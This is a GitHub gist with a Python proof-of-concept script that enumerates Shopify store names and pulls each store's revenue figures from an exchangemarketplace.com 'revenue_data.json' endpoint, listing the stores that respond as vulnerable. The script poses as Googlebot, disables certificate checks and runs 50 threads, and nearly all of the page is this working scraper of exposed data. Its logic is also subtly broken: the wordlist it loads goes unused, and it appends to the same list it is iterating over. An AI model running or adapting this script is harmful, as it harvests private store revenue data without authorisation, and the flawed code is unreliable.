Last active
April 25, 2019 22:59
-
-
Save ayoubfathi/09ca743a586b85f23fe235f955834760 to your computer and use it in GitHub Desktop.
Given a wordlist this will look for revenue data of shopify stores
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import requests | |
| import bs4 as bs | |
| from concurrent.futures import ThreadPoolExecutor | |
| from concurrent.futures import ProcessPoolExecutor | |
| try: | |
| import requests.packages.urllib3 | |
| requests.packages.urllib3.disable_warnings() | |
| except Exception: | |
| pass | |
| _headers = { | |
| 'User-Agent': 'Googlebot/2.1 (+http://www.google.com/bot.html)', | |
| 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', | |
| } | |
| def almostvuln(StoreName): | |
| POC_URL = "https://exchangemarketplace.com/shops/{}/revenue_data.json".format( | |
| StoreName) | |
| try: | |
| _Response = requests.get( | |
| POC_URL, | |
| headers=_headers, | |
| verify=False, | |
| allow_redirects=True) | |
| if _Response.status_code in [200, 304]: | |
| vuln_stores.append(StoreName) | |
| print(StoreName) | |
| elif _Response.status_code == 404: | |
| pass | |
| else: | |
| print(_Response.status_code) | |
| except BaseException: | |
| pass | |
| return vuln_stores | |
| if __name__ == '__main__': | |
| try: | |
| shops = [line.rstrip('\n') for line in open('wordlist.txt')] | |
| vuln_stores = [line.rstrip('\n') for line in open('shops.txt')] | |
| with ThreadPoolExecutor(max_workers=50) as executor1: | |
| executor1.map(almostvuln, vuln_stores) | |
| except KeyboardInterrupt: | |
| print("") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment